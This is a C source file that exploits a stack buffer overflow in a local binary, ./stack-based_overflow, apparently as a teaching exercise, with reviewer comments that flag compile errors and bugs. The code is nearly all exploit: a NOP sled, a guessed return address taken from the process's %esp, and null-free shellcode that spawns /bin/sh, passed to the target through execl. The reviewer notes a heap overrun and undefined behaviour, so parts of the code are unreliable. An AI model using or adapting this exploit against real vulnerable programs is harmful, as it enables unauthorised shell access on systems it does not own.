// stack-based_exploit.c : exploitation of a stack buffer overflow
//
// NOTE(review): no #include directives are visible in this file; malloc, free,
// printf, strlen and execl are called without prototypes (implicit function
// declarations are not valid C99+ and will not compile with a modern cc).
// The inline asm below (%esp/%eax) and the 4-byte stride used when filling the
// buffer assume 32-bit x86 with sizeof(long) == 4.
// Inferred, not shown here: the technique relies on a predictable stack
// address and an executable stack in the target; stack randomisation, a
// non-executable stack or a stack canary in ./stack-based_overflow would stop
// it. The target binary itself is not on this page.

#define OFFSET 164        // bytes subtracted from this process's %esp to build the guessed return address
#define LONG_NOPSLED 40   // number of leading 0x90 (NOP) bytes written into buffer
#define LONG_BUFFER 109   // size in bytes of the argument buffer handed to the target

// Payload bytes copied into buffer after the NOP sled. It is "null-free" so
// that no byte terminates the argv string early (buffer is passed through
// execl() as a C string).
char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";
// This shellcode is taken from the now-defunct http://shellcode.org/shellcode/linux/null-free/

// Returns the current stack pointer: the inline asm copies %esp into %eax.
// NOTE(review): there is no return statement; the function relies on %eax
// happening to be the return register. Reaching the end of a non-void
// function and using the value is undefined behaviour and may break under
// optimisation.
unsigned long stack_pointer() {
    __asm__("movl %esp, %eax");
}

// Builds one argv string and execs ./stack-based_overflow with it.
// Layout written into buffer (LONG_BUFFER bytes):
//   1. every 4-byte slot is set to ret_adr_eff (the guessed return address);
//   2. the first LONG_NOPSLED bytes are then overwritten with 0x90 NOPs;
//   3. the shellcode bytes follow the sled;
//   4. buffer[LONG_BUFFER - 1] is set to 0 so execl sees a terminated string.
// Returns 0 whether or not execl succeeded; on success it never returns.
int main() {
    int i;
    long *temp_addr,ret_adr_eff,esp;   // esp is declared but never used
    char *buffer,*temp_ptr;

    buffer = malloc(LONG_BUFFER);   // NOTE(review): result is not checked for NULL
    ret_adr_eff = stack_pointer();  // %esp of this process at the call site
    ret_adr_eff -= OFFSET;          // guess that the target's frame sits OFFSET bytes lower
    temp_ptr = buffer;
    temp_addr = (long *) temp_ptr;
    // NOTE(review): %x expects unsigned int but receives a long (ret_adr_eff);
    // this is a format/argument mismatch that only lines up when long is 32-bit.
    printf("Adresse cible à 0x%x (offset de 0x%x)\n",ret_adr_eff,OFFSET);

    // Inject the return address into every 4-byte slot.
    // NOTE(review): i takes the values 0,4,...,108 (28 iterations), so 28 * 4 =
    // 112 bytes are written into a 109-byte allocation: a 3-byte heap overrun.
    // Any zero byte inside ret_adr_eff would also terminate the argv string early.
    for (i=0;i < LONG_BUFFER;i+=4)
        *(temp_addr++) = ret_adr_eff;

    // Inject the NOP sled over the first LONG_NOPSLED bytes.
    for (i=0;i < LONG_NOPSLED;++i)
        buffer[i] = '\x90';
    temp_ptr += LONG_NOPSLED;

    // Inject the shellcode right after the sled.
    // strlen(shellcode) is re-evaluated on every iteration; the value is constant here.
    for (i=0;i < strlen(shellcode); i++)
        *(temp_ptr++) = shellcode[i];

    // Terminate the string: the address-fill loop left no NUL in the buffer.
    buffer[LONG_BUFFER - 1] = 0;

    // NOTE(review): the variadic terminator should be (char *)NULL, not the int 0,
    // to be portable. execl's return value is not checked, so on failure the
    // program still exits 0. free() and return are only reached if execl fails.
    execl("./stack-based_overflow","stack-based_overflow",buffer,0);
    free(buffer);
    return 0;
}